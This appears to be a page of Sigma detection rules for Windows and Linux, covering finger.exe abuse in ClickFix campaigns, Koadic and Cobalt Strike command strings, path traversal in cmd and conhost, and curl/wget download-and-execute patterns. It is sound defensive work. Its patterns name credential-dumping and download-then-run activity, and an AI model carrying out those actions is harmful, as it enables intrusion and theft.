Since the finger utility is not commonly used in modern Windows environments, its presence already raises suspicion.
Investigating such network connections can also help identify potential malicious infrastructure used by threat actors
status experimental
author Swachchhanda Shrawan Poudel (Nextron Systems)
id 2fdaf50b-9fd5-449f-ba69-f17248119af6
license Sigma · DRL-1.1
view Sigma YAML
title: Network Connection Initiated via Finger.EXE
id: 2fdaf50b-9fd5-449f-ba69-f17248119af6
related:
- id: c082c2b0-525b-4dbc-9a26-a57dc4692074
type: similar
- id: af491bca-e752-4b44-9c86-df5680533dbc
type: similar
status: experimental
description: |
Detects network connections via finger.exe, which can be abused by threat actors to retrieve remote commands for execution on Windows devices.
In one ClickFix malware campaign, adversaries leveraged the finger protocol to fetch commands from a remote server.
Since the finger utility is not commonly used in modern Windows environments, its presence already raises suspicion.
Investigating such network connections can also help identify potential malicious infrastructure used by threat actors
references:
- https://www.bleepingcomputer.com/news/security/decades-old-finger-protocol-abused-in-clickfix-malware-attacks/
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-11-19
tags:
- attack.command-and-control
- attack.t1071.004
- attack.execution
- attack.t1059.003
logsource:
category: network_connection
product: windows
detection:
selection:
Initiated: 'true'
Image|endswith: '\finger.exe'
condition: selection
falsepositives:
- Unlikely
level: high
related
high
DNS Query by Finger Utility
Detects DNS queries made by the finger utility, which can be abused by threat actors to retrieve remote commands for execution on Windows devices.
In one ClickFix malware campaign, adversaries leveraged the finger protocol to fetch commands from a remote server.
Since the finger utility is not commonly used in modern Windows environments, its presence already raises suspicion.
Investigating such DNS queries can also help identify potential malicious infrastructure used by threat actors for command and control (C2) communication.
status experimental
author Swachchhanda Shrawan Poudel (Nextron Systems)
id c082c2b0-525b-4dbc-9a26-a57dc4692074
license Sigma · DRL-1.1
view Sigma YAML
title: DNS Query by Finger Utility
id: c082c2b0-525b-4dbc-9a26-a57dc4692074
related:
- id: 2fdaf50b-9fd5-449f-ba69-f17248119af6
type: similar
- id: af491bca-e752-4b44-9c86-df5680533dbc
type: similar
status: experimental
description: |
Detects DNS queries made by the finger utility, which can be abused by threat actors to retrieve remote commands for execution on Windows devices.
In one ClickFix malware campaign, adversaries leveraged the finger protocol to fetch commands from a remote server.
Since the finger utility is not commonly used in modern Windows environments, its presence already raises suspicion.
Investigating such DNS queries can also help identify potential malicious infrastructure used by threat actors for command and control (C2) communication.
references:
- https://www.bleepingcomputer.com/news/security/decades-old-finger-protocol-abused-in-clickfix-malware-attacks/
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-11-19
tags:
- attack.command-and-control
- attack.t1071.004
- attack.execution
- attack.t1059.003
logsource:
product: windows
category: dns_query
detection:
selection:
Image|endswith: '\finger.exe'
condition: selection
falsepositives:
- Unlikely
level: high
related
high
Suspicious HWP Sub Processes
Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation
status test
author Florian Roth (Nextron Systems)
id 023394c4-29d5-46ab-92b8-6a534c6f447b
license Sigma · DRL-1.1
view Sigma YAML
title: Suspicious HWP Sub Processes
id: 023394c4-29d5-46ab-92b8-6a534c6f447b
status: test
description: Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation
references:
- https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/
- https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1
- https://twitter.com/cyberwar_15/status/1187287262054076416
- https://blog.alyac.co.kr/1901
- https://en.wikipedia.org/wiki/Hangul_(word_processor)
author: Florian Roth (Nextron Systems)
date: 2019-10-24
modified: 2021-11-27
tags:
- attack.initial-access
- attack.t1566.001
- attack.execution
- attack.t1203
- attack.t1059.003
- attack.g0032
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\Hwp.exe'
Image|endswith: '\gbb.exe'
condition: selection
falsepositives:
- Unknown
level: high
related
high
HackTool - Koadic Execution
Detects command line parameters used by Koadic hack tool
status test
author wagga, Jonhnathan Ribeiro, oscd.community
id 5cddf373-ef00-4112-ad72-960ac29bac34
license Sigma · DRL-1.1
view Sigma YAML
title: HackTool - Koadic Execution
id: 5cddf373-ef00-4112-ad72-960ac29bac34
status: test
description: Detects command line parameters used by Koadic hack tool
references:
- https://unit42.paloaltonetworks.com/unit42-sofacy-groups-parallel-attacks/
- https://github.com/offsecginger/koadic/blob/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/stager/js/stdlib.js
- https://blog.f-secure.com/hunting-for-koadic-a-com-based-rootkit/
author: wagga, Jonhnathan Ribeiro, oscd.community
date: 2020-01-12
modified: 2023-02-11
tags:
- attack.execution
- attack.t1059.003
- attack.t1059.005
- attack.t1059.007
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith: '\cmd.exe'
- OriginalFileName: 'Cmd.Exe'
selection_cli:
CommandLine|contains|all:
- '/q'
- '/c'
- 'chcp'
condition: all of selection_*
falsepositives:
- Unknown
level: high
related
high
Operator Bloopers Cobalt Strike Modules
Detects Cobalt Strike module/commands accidentally entered in CMD shell
status test
author _pete_0, TheDFIRReport
id 4f154fb6-27d1-4813-a759-78b93e0b9c48
license Sigma · DRL-1.1
view Sigma YAML
title: Operator Bloopers Cobalt Strike Modules
id: 4f154fb6-27d1-4813-a759-78b93e0b9c48
related:
- id: 647c7b9e-d784-4fda-b9a0-45c565a7b729
type: similar
status: test
description: Detects Cobalt Strike module/commands accidentally entered in CMD shell
references:
- https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf
- https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/
- https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/
author: _pete_0, TheDFIRReport
date: 2022-05-06
modified: 2023-01-30
tags:
- attack.execution
- attack.t1059.003
logsource:
category: process_creation
product: windows
detection:
selection_img:
- OriginalFileName: 'Cmd.Exe'
- Image|endswith: '\cmd.exe'
selection_cli:
CommandLine|contains:
- 'Invoke-UserHunter'
- 'Invoke-ShareFinder'
- 'Invoke-Kerberoast'
- 'Invoke-SMBAutoBrute'
- 'Invoke-Nightmare'
- 'zerologon'
- 'av_query'
condition: all of selection_*
falsepositives:
- Unknown
level: high
related
high
HackTool - RedMimicry Winnti Playbook Execution
Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility
status test
author Alexander Rausch
id 95022b85-ff2a-49fa-939a-d7b8f56eeb9b
license Sigma · DRL-1.1
view Sigma YAML
title: HackTool - RedMimicry Winnti Playbook Execution
id: 95022b85-ff2a-49fa-939a-d7b8f56eeb9b
status: test
description: Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility
references:
- https://redmimicry.com/posts/redmimicry-winnti/
author: Alexander Rausch
date: 2020-06-24
modified: 2023-03-01
tags:
- attack.execution
- attack.stealth
- attack.t1106
- attack.t1059.003
- attack.t1218.011
logsource:
product: windows
category: process_creation
detection:
selection:
Image|endswith:
- '\rundll32.exe'
- '\cmd.exe'
CommandLine|contains:
- 'gthread-3.6.dll'
- '\Windows\Temp\tmp.bat'
- 'sigcmm-2.4.dll'
condition: selection
falsepositives:
- Unknown
level: high
related
high
Operator Bloopers Cobalt Strike Commands
Detects use of Cobalt Strike commands accidentally entered in the CMD shell
status test
author _pete_0, TheDFIRReport
id 647c7b9e-d784-4fda-b9a0-45c565a7b729
license Sigma · DRL-1.1
view Sigma YAML
title: Operator Bloopers Cobalt Strike Commands
id: 647c7b9e-d784-4fda-b9a0-45c565a7b729
related:
- id: 4f154fb6-27d1-4813-a759-78b93e0b9c48
type: similar
status: test
description: Detects use of Cobalt Strike commands accidentally entered in the CMD shell
references:
- https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf
- https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/
- https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/
author: _pete_0, TheDFIRReport
date: 2022-05-06
modified: 2023-01-30
tags:
- attack.execution
- attack.t1059.003
- stp.1u
logsource:
category: process_creation
product: windows
detection:
selection_img:
- OriginalFileName: 'Cmd.Exe'
- Image|endswith: '\cmd.exe'
selection_cli:
CommandLine|startswith:
- 'cmd '
- 'cmd.exe'
- 'c:\windows\system32\cmd.exe'
CommandLine|contains:
- 'psinject'
- 'spawnas'
- 'make_token'
- 'remote-exec'
- 'rev2self'
- 'dcsync'
- 'logonpasswords'
- 'execute-assembly'
- 'getsystem'
condition: all of selection_*
falsepositives:
- Unknown
level: high
related
high
Conhost.exe CommandLine Path Traversal
detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking
status test
author Nasreddine Bencherchali (Nextron Systems)
id ee5e119b-1f75-4b34-add8-3be976961e39
license Sigma · DRL-1.1
view Sigma YAML
title: Conhost.exe CommandLine Path Traversal
id: ee5e119b-1f75-4b34-add8-3be976961e39
status: test
description: detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking
references:
- https://pentestlab.blog/2020/07/06/indirect-command-execution/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-06-14
tags:
- attack.execution
- attack.t1059.003
logsource:
category: process_creation
product: windows
detection:
selection:
ParentCommandLine|contains: 'conhost'
CommandLine|contains: '/../../'
condition: selection
falsepositives:
- Unlikely
level: high
related
high
Potential CommandLine Path Traversal Via Cmd.EXE
Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking
status test
author xknow @xknow_infosec, Tim Shelton
id 087790e3-3287-436c-bccf-cbd0184a7db1
license Sigma · DRL-1.1
view Sigma YAML
title: Potential CommandLine Path Traversal Via Cmd.EXE
id: 087790e3-3287-436c-bccf-cbd0184a7db1
status: test
description: Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking
references:
- https://hackingiscool.pl/cmdhijack-command-argument-confusion-with-path-traversal-in-cmd-exe/
- https://twitter.com/Oddvarmoe/status/1270633613449723905
author: xknow @xknow_infosec, Tim Shelton
date: 2020-06-11
modified: 2023-03-06
tags:
- attack.execution
- attack.t1059.003
logsource:
category: process_creation
product: windows
detection:
selection_img:
- ParentImage|endswith: '\cmd.exe'
- Image|endswith: '\cmd.exe'
- OriginalFileName: 'cmd.exe'
selection_flags:
- ParentCommandLine|contains:
- '/c'
- '/k'
- '/r'
- CommandLine|contains:
- '/c'
- '/k'
- '/r'
selection_path_traversal:
- ParentCommandLine: '/../../'
- CommandLine|contains: '/../../'
filter_java:
CommandLine|contains: '\Tasktop\keycloak\bin\/../../jre\bin\java'
condition: all of selection_* and not 1 of filter_*
falsepositives:
- Java tools are known to produce false-positive when loading libraries
level: high
related
high
Suspicious Download and Execute Pattern via Curl/Wget
Detects suspicious use of command-line tools such as curl or wget to download remote
content - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by
immediate execution, indicating potential malicious activity. This pattern is commonly used
by malicious scripts, stagers, or downloaders in fileless or multi-stage Linux attacks.
status experimental
author Aayush Gupta
id a2d9e2f3-0f43-4c7a-bcd9-9acfc0d723aa
license Sigma · DRL-1.1
view Sigma YAML
title: Suspicious Download and Execute Pattern via Curl/Wget
id: a2d9e2f3-0f43-4c7a-bcd9-9acfc0d723aa
status: experimental
description: |
Detects suspicious use of command-line tools such as curl or wget to download remote
content - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by
immediate execution, indicating potential malicious activity. This pattern is commonly used
by malicious scripts, stagers, or downloaders in fileless or multi-stage Linux attacks.
references:
- https://gtfobins.github.io/gtfobins/wget/
- https://gtfobins.github.io/gtfobins/curl/
author: Aayush Gupta
date: 2025-06-17
tags:
- attack.execution
- attack.t1059.004
- attack.t1203
logsource:
category: process_creation
product: linux
detection:
selection_downloader:
CommandLine|contains:
- '/curl'
- '/wget'
selection_tmp:
CommandLine|contains:
- '/tmp/'
- '/dev/shm/'
selection_executor:
CommandLine|contains: 'sh -c'
condition: all of selection_*
falsepositives:
- System update scripts using temporary files
- Installer scripts or automated provisioning tools
level: high
related
high
Shell Invocation via Env Command - Linux
Detects the use of the env command to invoke a shell. This may indicate an attempt to bypass restricted environments, escalate privileges, or execute arbitrary commands.
status test
author Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
id bed978f8-7f3a-432b-82c5-9286a9b3031a
license Sigma · DRL-1.1
view Sigma YAML
title: Shell Invocation via Env Command - Linux
id: bed978f8-7f3a-432b-82c5-9286a9b3031a
status: test
description: |
Detects the use of the env command to invoke a shell. This may indicate an attempt to bypass restricted environments, escalate privileges, or execute arbitrary commands.
references:
- https://gtfobins.github.io/gtfobins/env/#shell
- https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html
author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
date: 2024-09-02
modified: 2026-01-08
tags:
- attack.execution
- attack.t1059.004
logsource:
category: process_creation
product: linux
detection:
selection:
Image|endswith: '/env'
CommandLine|contains:
- '/bin/bash'
- '/bin/dash'
- '/bin/fish'
- '/bin/sh'
- '/bin/zsh'
condition: selection
falsepositives:
- Github operations such as ghe-backup
level: high